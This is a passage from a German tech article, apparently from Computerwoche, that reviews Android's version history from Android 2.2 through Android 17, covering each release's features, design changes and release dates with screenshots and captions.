<p>Bemerkenswert ist <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Version 2.2 vor allem auch deshalb, weil es den <a href="https://www.computerwoche.de/article/2823820/die-5-besten-chrome-alternativen.html" title="Android-Webbrowser" target="_blank">Android-Webbrowser</a> mit Flash-Unterstützung ausstattete. Das war nicht nur wichtig, weil Flash damals im Web allgegenwärtig war, sondern auch weil Apple sich standhaft weigerte, das <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a> um Flash-Support zu erweitern. Das war eine ganze Zeit lang ein <a href="https://www.computerworld.com/article/1484597/flash-boom-bang-android-and-the-adobe-flash-clash.html" title="echter Vorteil für Android" target="_blank">echter Vorteil für Android</a> – bis sich die Flash-Dominanz schließlich in Luft auflöste.</p>



<h2 class="wp-block-heading">Android 2.3 Gingerbread</h2>



<p>Mit Gingerbread versuchte Google, <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> im Jahr 2010 erstmals eine echte, “visuelle Identität” zu verleihen. Die Farbe des Android-Maskottchens breitete sich mit Android Version 2.3 über die gesamte Benutzeroberfläche aus. Der erste Schritt hin zu einer eigenständigen Designsprache. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Mit Android Gingerbread nahm die Android-Designsprache ihren Anfang." title="Mit Android Gingerbread nahm die Android-Designsprache ihren Anfang." src="https://images.computerwoche.de/bdb/3392480/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Mit Android Gingerbread nahm die Android-Designsprache ihren Anfang.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 3.0/3.1/3.2 Honeycomb</h2>



<p>Die <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Honeycomb-Ära markierte ab 2011 einen weiteren Umbruch: Android 3.0 war ein <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a>-exklusives Betriebssystem, das zum Marktstart des <a href="https://www.computerwoche.de/k/ipad,3456" target="_blank" class="idgGlossaryLink">iPad</a>-Konkurrenten <a href="https://de.wikipedia.org/wiki/Motorola_Xoom" title="Motorola Xoom" target="_blank" rel="noopener">Motorola Xoom</a> veröffentlicht wurde. Auch die Point-Updates 3.1 und 3.2 waren exklusiv auf die zu dieser Zeit stark gefragten <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> ausgelegt. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android Honeycomb sollte Tablets einen " title="Android Honeycomb sollte Tablets einen " src="https://images.computerwoche.de/bdb/3392481/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android Honeycomb sollte Tablets einen “Weltraum-ähnlichen”, “holografischen” Look verleihen.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Zwar hatte das Konzept der <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a>-spezifischen Oberfläche schon nach kurzer Zeit wieder ausgedient – allerdings wurden mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 3.0 zahlreiche Ideen umgesetzt, die das heute bekannte Android definiert haben: Honeycomb war die erste Android-Version, die die Nutzer essenzielle Navigationsbefehle über virtuelle Bildschirmtasten erledigen ließ und führte das Konzept einer “Karten-basierten” UI ein. </p>



<h2 class="wp-block-heading">Android 4.0 Ice Cream Sandwich</h2>



<p>Während Honeycomb so etwas wie eine “Brückenversion” darstellte, bildete <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 4.0 – Codename Ice Cream Sandwich – den offiziellen Einstiegspunkt in die neue Android-Designwelt. Veröffentlicht wurde diese Version ebenfalls im Jahr 2011 – und verfeinerte in erster Linie die mit Honeycomb eingeführten, visuellen Konzepte. Zudem vereinheitlichte Google mit dieser Android-Version sein Betriebssystem für Mobiltelefone und <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a>.</p>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 4.0 wurde zudem die Steuerung über Wischbewegungen als integrale Methode etabliert, um sich zurechtzufinden – eine damals weltbewegende Neuerung. Darüber hinaus markierte Ice Cream Sandwich auch den Beginn der Umstellung des Android-Ökosystems auf ein standardisiertes Design-Framework, auch bekannt als “<a href="https://android-developers.googleblog.com/2012/01/holo-everywhere.html" title="Holo" target="_blank" rel="noopener">Holo</a>“.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Homescreen und App Switching in Android 4.0." title="Homescreen und App Switching in Android 4.0." src="https://images.computerwoche.de/bdb/3392482/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Homescreen und App Switching in Android 4.0.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 4.1/4.2/4.3 Jelly Bean</h2>



<p>Die Jelly-Bean-Ära erstreckte sich über drei <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Versionen und die Jahre 2012 und 2013. Dabei wurde das frische Fundament von Ice Cream Sandwich mit Bedacht, aber zielstrebig weiter optimiert und ausgebaut. Ergebnis war ein Android-Betriebssystem, das mit neuem Schwung und Glanz zunehmend auch Mobile-Durchschnittsbenutzer begeistern konnte.</p>



<p>Abgesehen von der Optik brachte Jelly Bean auch einen ersten Vorgeschmack auf Google Now (das leider inzwischen zu einem zweitklassigen Newsfeed <a href="https://www.computerworld.com/article/1713354/google-feed.html" title="verkommen ist" target="_blank">verkommen ist</a>). Weitere Benefits, die mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Jelly Bean Einzug hielten, waren unter anderem ein erweitertes (sprachbasiertes) Suchsystem und Multi-User-Support. Letzteres stand allerdings nur auf <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a>-Geräten zur Verfügung. Davon abgesehen, gab auch das Quick Settings Panel in dieser Android-Version sein Debüt – genauso wie Widgets für den Sperrbildschirm.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Quick Settings und der (kurzlebige) Widget-befüllte Lockscreen in Android Jelly Bean." title="Quick Settings und der (kurzlebige) Widget-befüllte Lockscreen in Android Jelly Bean." src="https://images.computerwoche.de/bdb/3392483/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Quick Settings und der (kurzlebige) Widget-befüllte Lockscreen in Android Jelly Bean.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 4.4 KitKat</h2>



<p>Mit Version 4.4 kam das Zeitalter der dunklen Farbgebung bei <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> zu einem Ende. KitKat brachte Ende 2013 frischere, hellere Farben für Googles Betriebssystem und sorgte damit für eine umfassende, optische Modernisierung. Premiere feierte mit Android 4.4 außerdem das allseits bekannte “OK, Google”-Freihand-Feature (das damals nur funktionierte, wenn der Startbildschirm oder die Google-App bereits geöffnet war).</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Kitkat-Homescreen und das dedizierte Google-Now-Panel." title="Der Kitkat-Homescreen und das dedizierte Google-Now-Panel." src="https://images.computerwoche.de/bdb/3392484/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Kitkat-Homescreen und das dedizierte Google-Now-Panel.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Die Nutzer von Google-eigenen (Nexus-)Smartphones durften sich zudem erstmals an einem Startbildschirm-Panel erfreuen, das exklusiv für Google-Dienste reserviert war.</p>



<h2 class="wp-block-heading">Android 5.0/5.1 Lollipop</h2>



<p>Mit Lollipop führte Google im Herbst 2014 den bis heute gültigen <a href="https://www.computerworld.com/article/1618144/material-design-1-year-later-pocket-pocketcasts.html" title="Material-Design-Standard" target="_blank">Material-Design-Standard</a> bei <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> ein, der sich nicht nur auf das Betriebssystem selbst, sondern auch auf Apps und andere Google-Produkte auswirkte. Das kartenbasierte User Interface, das bislang punktuell in Android eingesetzt wurde, wurde mit Android 5.0 zum zentralen Designaspekt.</p>



<p>Davon abgesehen, brachte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Lollipop auch einige neue Funktionen in die Android-Welt – unter anderem den weiterentwickelten “Ok, Google”-Befehl, Multi-User-Support für Mobiltelefone sowie ein optimiertes Benachrichtigungsmanagement. Leider flossen mit Lollipop auch <a href="https://www.computerworld.com/article/1617255/broken-lollipop-android-50.html" title="diverse Bugs" target="_blank">diverse Bugs</a> ein, die in weiten Teilen erst mit der <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version 5.1 ab 2015 vollständig behoben werden konnten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Mit Lollipop nahm Androids Material Design seinen Anfang." title="Mit Lollipop nahm Androids Material Design seinen Anfang." src="https://images.computerwoche.de/bdb/3392485/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Mit Lollipop nahm Androids Material Design seinen Anfang.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 6.0 Marshmallow</h2>



<p>Im Großen und Ganzen war Marshmallow – ebenfalls im Jahr 2015 veröffentlicht – eine eher unbedeutende <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version, die mehr wie ein Point-Update wirkte. Allerdings setzte Marshmallow den Startpunkt dafür, dass Google jährlich eine große neue Android-Version veröffentlicht.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android Marshmallow und " title="Android Marshmallow und " src="https://images.computerwoche.de/bdb/3392486/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android Marshmallow und “Now on Tap” (RIP).</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Das auffälligste Marshmallow-Feature war die vielversprechende Bildschirmsuchfunktion “Now On Tap” – die leider nie weiterentwickelt und 2016 still und heimlich beerdigt wurde. <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 6.0 enthielt jedoch auch einige subtilere Neuerungen, etwa granularere App-Berechtigungen sowie Support für Fingerabdruckscanner und USB-C.</p>



<h2 class="wp-block-heading">Android 7.0/7.1 Nougat</h2>



<p>Die <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Versionen mit dem Codenamen Nougat wurden 2016 veröffentlicht und ergänzten Googles Mobile OS um einen nativen Split-Screen-Modus, ein neues System, um Benachrichtigungen zu managen, und eine Data-Saver-Funktion. Darüber hinaus hatte Android 7.0 bis 7.1 auch einige kleinere, aber dennoch wichtige Features an Bord – beispielsweise einen <a href="https://www.computerworld.com/article/1713251/time-saving-android-shortcuts.html" title="Shortcut" target="_blank">Shortcut</a>, um zwischen Apps zu wechseln.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der mit Nougat neu eingeführte, native Split-Screen-Modus." title="Der mit Nougat neu eingeführte, native Split-Screen-Modus." src="https://images.computerwoche.de/bdb/3392487/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der mit Nougat neu eingeführte, native Split-Screen-Modus.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Die vielleicht wichtigste Neuerung von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Nougat war jedoch die Möglichkeit, den Google Assistant zu integrieren, der etwa zwei Monate nach dem Nougat-Debüt (zusammen mit Google <a href="https://www.computerworld.com/article/1667955/google-pixel-phone.html" title="erstem Pixel-Smartphone" target="_blank">erstem Pixel-Smartphone</a>) vorgestellt wurde. Der Assistant entwickelte sich in den kommenden Jahren zu einer wichtigen <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Komponente (und den meisten anderen Google-Produkten).</p>



<h2 class="wp-block-heading">Android 8.0/8.1 Oreo</h2>



<p>Mit Version 8.0 und 8.1 – veröffentlicht im Jahr 2017 unter dem Codenamen Oreo – erhielt <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> weitere Annehmlichkeiten. Unter anderem einen nativen Bild-in-Bild-Modus, eine Schlummerfunktion für Notifications sowie tiefgehendere Möglichkeiten, App-Benachrichtigungen zu kontrollieren. </p>



<p>Darüber hinaus war diese <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version auch ein Versuch von Google, Android und Chrome OS <a href="https://www.computerworld.com/article/1711690/android-chrome-os-alignment.html" title="näher zusammenzubringen" target="_blank">näher zusammenzubringen</a> und die Nutzung von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Apps auf Chromebooks zu optimieren. Davon abgesehen war Android 8 auch vom ehrgeizigen Bestreben geprägt, mit “<a href="https://www.computerworld.com/article/1680570/google-android-upgrades-project-treble.html" title="Project Treble" target="_blank">Project Treble</a>” eine modulare Basis für den <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Quellcode zu schaffen. Die Hoffnung: Es den Geräteherstellern einfacher zu machen, zeitnah Software-Updates bereitzustellen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android Oreo erweiterte Googles mobiles Betriebssystem um diverse bedeutende Funktionen." title="Android Oreo erweiterte Googles mobiles Betriebssystem um diverse bedeutende Funktionen." src="https://images.computerwoche.de/bdb/3392488/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android Oreo erweiterte Googles mobiles Betriebssystem um diverse bedeutende Funktionen.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 9 Pie</h2>



<p><a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version 9, auch bekannt unter dem Codenamen Pie, brachte im August 2018 frischen Wind in Googles Mobile-Ökosystem. Die wesentlichste Änderung war dabei ein <a href="https://www.computerworld.com/article/1689846/android-p-gesture-navigation.html" title="hybrides Gesten-Button-Navigationssystem" target="_blank">hybrides Gesten-Button-Navigationssystem</a>, das die traditionellen Navigationstasten mit einem großen, multifunktionalen “Home Button” ersetzte.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Alles neu machte Android 9 - zumindest in Sachen Bedienung." title="Alles neu machte Android 9 - zumindest in Sachen Bedienung." src="https://images.computerwoche.de/bdb/3392489/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Alles neu machte Android 9 – zumindest in Sachen Bedienung.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p><a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Pie enthielt allerdings auch einige bemerkenswerte neue Productivity-Funktionen, beispielsweise ein universelles System, um mit vorgeschlagenen Antworten auf Nachrichten zu reagieren oder ein intelligenteres Energiemanagement. Erwähnenswert sind bei dieser Android-Version zudem zahlreiche Optimierungen in Sachen Datenschutz und Sicherheit.</p>



<h2 class="wp-block-heading">Android Version 10</h2>



<p>Im September 2019 ereilte der nächste Umschwung auch die Backwerk-affine Nomenklatur: <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 10 war die erste Version, die <a href="https://www.computerworld.com/article/1657690/android-10-end-of-whimsy.html" title="ausschließlich mit einer Zahl" target="_blank">ausschließlich mit einer Zahl</a> bezeichnet wird. Dazu passend brachte die Betriebssystem-Software auch eine völlig neu gestaltete Oberfläche mit sich, die ab diesem Zeitpunkt vollständig auf Wischbewegungen ausgelegt war.</p>



<p>Zu den wichtigen Verbesserungen, die <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 10 darüber hinaus an Bord hatte, gehörten ein aktualisiertes App-Berechtigungssystem mit tioefergehenden Kontrollmöglichkeiten, eine “Darkmode”-Option, ein Fokusmodus sowie die Möglichkeit, abzuspielende Mediendateien automatisch mit Untertiteln zu versehen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Speziell in Sachen Standortdaten brachte Android 10 eine dringend nötige Nuancierung." title="Speziell in Sachen Standortdaten brachte Android 10 eine dringend nötige Nuancierung." src="https://images.computerwoche.de/bdb/3392490/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Speziell in Sachen Standortdaten brachte Android 10 eine dringend nötige Nuancierung.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android Version 11</h2>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Version 11 veröffentlichte Google im September 2020 ein umfassendes Software-Update, das zahlreiche Neuerungen brachte. Die wichtigste Änderung drehte sich <a href="https://www.computerworld.com/article/1629241/android-11-additions.html" title="um das Thema Datenschutz" target="_blank">um das Thema Datenschutz</a>: Das mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 10 eingeführte Berechtigungssystem wurde um die Möglichkeit erweitert, Apps einmaligen Zugriff auf Standortdaten, Kamera oder Mikrofon zu gewähren.</p>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 11 erschwerte Google außerdem, dass Apps den Standort der Nutzer im Hintergrund ermitteln können und führte eine Funktion ein, die Apps automatisch Berechtigungen entzieht, wenn diese für längere Zeit nicht genutzt wurden. Auf Interface-Ebene bot Android 11 außerdem einen vereinheitlichten Media Player, eine Benachrichtigungshistorie, die Möglichkeit, alle verbundenen Geräte in einer Übersicht anzuzeigen sowie eine native Screen-Recording-Funktion.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der neue Einheits-Media-Player in Android 11." title="Der neue Einheits-Media-Player in Android 11." src="https://images.computerwoche.de/bdb/3392491/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der neue Einheits-Media-Player in Android 11.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android Version 12</h2>



<p>Die finale Version von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 12 präsentierte Google pünktlich zur Markteinführung seiner Smartphones <a href="https://www.computerwoche.de/article/2809810/google-mutter-verdient-kraeftig.html" title="Pixel 6 und Pixel 6 Pro" target="_blank">Pixel 6 und Pixel 6 Pro</a> im Oktober 2021. Die wesentlichen Fortschritte waren bei dieser <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version direkt sichtbar: Sie bot die wohl größte Interface-Überarbeitung bei Android seit Lollipop und führte einen aktualisierten Design-Standard namens “Material You” ein. Das fußt auf der Idee, das Erscheinungsbild des Betriebssystems mit dynamisch generierten Themes an die individuelle “Farbwelt” des Benutzers anzupassen. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android 12 brachte einen völlig neuen frischen Look mit - dem " title="Android 12 brachte einen völlig neuen frischen Look mit - dem " src="https://images.computerwoche.de/bdb/3392492/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android 12 brachte einen völlig neuen frischen Look mit – dem “Material You”-Designstandard sei Dank.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Davon abgesehen hatte <a class="idgGlossaryLink" href="https://www.computerwoche.de/mobile/" target="_blank">Android</a> 12 auch ein (<a title="lange überfälliges" href="https://www.computerworld.com/article/1639159/android-missed-opportunity.html" target="_blank">lange überfälliges</a>) neues Widget-System sowie eine Reihe grundlegender Verbesserungen in den Bereichen Leistung, Sicherheit und Datenschutz zu bieten. In diesem Zuge erweiterte Google sein Betriebssystem auch um einen isolierten Bereich, der KI-Funktionen auch ohne Netzwerkzugriff und Datenexposition ermöglicht.</p>



<h2 class="wp-block-heading">Android Version 13</h2>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 13 veröffentlichte Google im August 2022 eine der bislang ungewöhnlichsten Android-Versionen: Sie ist eines der ehrgeizigsten Android-Updates überhaupt – beinhaltet gleichzeitig aber auch vornehmlich subtile Änderungen. Für das Nutzererlebnis spielte dabei auch eine tragende Rolle, auf welchem Device Android 13 installiert wurde. Für <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> und faltbare Smartphones führte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 13 ein gänzlich neues Interface-Design ein – mit dem Ziel, ein verbessertes Benutzererlebnis auf größeren Bildschirmen zu realisieren. Das schlug sich auch in einem auf Multitasking ausgelegten, aktualisierten Split-Screen-Modus und einer Taskbar im Chrome-OS-Stil nieder. Darüber hinaus schuf Android 13 auch die Vorraussetzung dafür, dass Pixel-<a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> als <a href="https://www.computerworld.com/article/1699827/google-assistant-working-from-home.html" title="stationäres Smart Display" target="_blank">stationäres Smart Display</a> fungieren konnten.</p>



<p>Mit Blick auf Smartphones war der Release von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 13 weit weniger bedeutsam. Neben einigen kleineren visuellen Optimierungen führte diese Android-Version ein erweitertes System für die Zwischenablage ein, eine native Funktion, um QR-Codes zu scannen, sowie weitere Optimierungen in den Bereichen Datenschutz, Sicherheit und Leistung.</p>



<h2 class="wp-block-heading">Android Version 14</h2>



<p>Nach achtmonatiger Entwicklungsphase präsentierte Google Anfang Oktober 2023 Android 14 – zeitgleich zur Vorstellung seiner <a href="https://www.computerwoche.de/article/2829090/google-pixel-8-pro-im-business.html" title="Pixel-8-Smartphones" target="_blank">Pixel-8-Smartphones</a>. Auch diese <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version kam eher subtil um die Ecke: Sie brachte zum Beispiel ein neues System zum Einsatz, um Text zwischen Apps im Drag-und-Drop-Verfahren auszutauschen, sowie native Anpassungsmöglichkeiten für den Android-Sperrbildschirm. Zudem durften die Nutzer mit Android 14 auf ein integriertes Dashboard zugreifen, um sämtliche ihrer Gesundheits- und Fitness-Daten zu managen.</p>



<p>Darüber hinaus enthält diese <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version eine Reihe wichtiger Erweiterungen für die Barrierefreiheit – etwa eine On-Demand-Lupe, verbesserten Support für Hörgeräte sowie die Möglichkeit, eingehende Nachrichten über den Kamerablitz zu visualisieren. Die Benutzer von Pixel 8 und Pixel 8 Pro durften mit Android 14 auch erstmals und exklusiv Googles KI-basierten Wallpaper Creator austesten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der KI-basierte Wallpaper Generator in Android 14 liefert interessante Ergebnisse." title="Der KI-basierte Wallpaper Generator in Android 14 liefert interessante Ergebnisse." src="https://images.computerwoche.de/bdb/3392493/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der KI-basierte Wallpaper Generator in Android 14 liefert interessante Ergebnisse.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android Version 15</h2>



<p>Technisch betrachtet hat Google Android 15 bereits <a href="https://android-developers.googleblog.com/2024/09/android-15-is-released-to-aosp.html" target="_blank" rel="noreferrer noopener">im September 2024</a> veröffentlicht – allerdings tauchte die neue Android-Version erst <a href="https://blog.google/products/android/android-15/" target="_blank" rel="noreferrer noopener">ab Mitte Oktober</a> auf den hauseigenen Pixel-Geräten auf.</p>



<p>Mit Android 15 hält eine ganze <a href="https://www.computerworld.com/article/3564973/android-15-features-google-pixel-phone.html" target="_blank">eine Reihe bemerkenswerter neuer Funktionen</a> Einzug. Darunter eine „Private Space“-Option, die es ermöglicht, sensible Applikationen beziehungsweise Inhalte mit einer zusätzlichen Authentifizierungsebene auszustatten. Davon abgesehen verbessert Version 15 auch die mit Android 13 eingeführten Multitasking-Systeme weiter: Die Android Taskbar ist jetzt optional dauerhaft präsent. Außerdem lassen sich bestimmte App-Kombinationen ab Version 15 mit einem Fingertipp im Split-Screen-Modus aufrufen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/03/07-android-15-private-space.jpg?quality=50&amp;strip=all&amp;w=1024" alt="private space settings in android 15" class="wp-image-3852845" width="1024" height="1025" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Mit „Private Space“ sind bestimmte Apps ausschließlich über einen geschützten (und optional auch versteckten) Bereich abrufbar.</figcaption></figure><p class="imageCredit">JR Raphael / Foundry</p></div>



<p>Weitere nennenswerte Neuerungen von Android 15 sind ein neu designtes Lautstärkeregelungs-Panel sowie ein (Pixel-exklusives) „Adaptive Vibration“-Feature, dass die Vibrationsintensität an der jeweils aktuellen Umgebung ausrichtet.</p>



<h2 class="wp-block-heading">Android Version 16</h2>



<p>Mit dem Jahr 2025 hat Google beschlossen, seinen bisherigen Android-Upgrade-Zyklus aufzubrechen: Beginnend mit der <a href="https://developer.android.com/about/versions/16?hl=de" target="_blank" rel="noreferrer noopener">Veröffentlichung von Version 16</a> sollen künftig pro Jahr zwei Android-Versionen erscheinen. Den ersten Teil dieses Versprechens hat Google bereits mit der Veröffentlichung von Android 16 im Juni 2025 umgesetzt.</p>



<p>Zu den wichtigsten neuen Funktionen von Android 16 zählen unter anderem <a href="https://www.androidauthority.com/android-16-live-notifications-3518375/" target="_blank" rel="noreferrer noopener">Live-Updates</a> – eine neue Art von Benachrichtigungen, die ähnlich funktionieren wie die Live-Aktivitäten bei iOS. Darüber hinaus verspricht Version 16 des Google-Mobile-Betriebssystems auch <a href="https://www.androidauthority.com/android-16-quick-settings-redesign-hands-on-3534161/" target="_blank" rel="noreferrer noopener">eine Reihe von Verbesserungen</a> für die Benutzeroberfläche, <a href="https://www.androidauthority.com/android-desktop-view-3533755/" target="_blank" rel="noreferrer noopener">ein besseres Desktop-Erlebnis</a> sowie Support für striktere Netzwerksicherheitsregeln.   </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2025/03/android-version-16-beta-app-adapting.jpg?quality=50&amp;strip=all&amp;w=1024" alt="android version 16 beta app adapting for screen width on two different devices" class="wp-image-3851568" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Mit Android 16 sollen Android-Apps sich endlich auch im Großformat ordentlich präsentieren – statt etwa auf Tablets ein Smartphone zu „simulieren“.</figcaption></figure><p class="imageCredit">Google</p></div>



<h2 class="wp-block-heading">Android Version 17</h2>



<p>Die erste Beta-Version von Android 17 wurde von Google Mitte Februar 2026 veröffentlicht. Eine <a href="https://android-developers.googleblog.com/2026/02/the-second-beta-of-android-17.html" target="_blank" rel="noreferrer noopener">zweite Beta</a> folgte bereits wenig später. Die finale Version des aktuellen Google Mobil-Betriebssystems wurde Mitte Juni 2026 veröffentlicht. Ein Fokus liegt bei Android 17 auf einer optimierten User Experience für faltbare Devices und Tablets, ein weiterer auf KI.</p>



<figure class="wp-block-embed is-type-rich is-provider-x wp-block-embed-x"><div class="wp-block-embed__wrapper youtube-video">
<blockquote class="twitter-tweet" data-width="500" data-dnt="true"><p lang="en" dir="ltr">🖐 Five things you need to know about Android 17: <br><br>1️⃣ The intelligence system<br>2️⃣ Adaptive-first<br>3️⃣ Performance improvements<br>4️⃣ Permissions through pickers<br>5️⃣ Pro-quality camera &amp; media<br><br>Read the details → <a href="https://t.co/jiij02K3Gr">https://t.co/jiij02K3Gr</a> <a href="https://t.co/X7QcuvBJdo">pic.twitter.com/X7QcuvBJdo</a></p>— Android Developers (@AndroidDev) <a href="https://x.com/AndroidDev/status/2069767498199708126?ref_src=twsrc%5Etfw">June 24, 2026</a></blockquote>
</div></figure>



<p>(fm)</p>



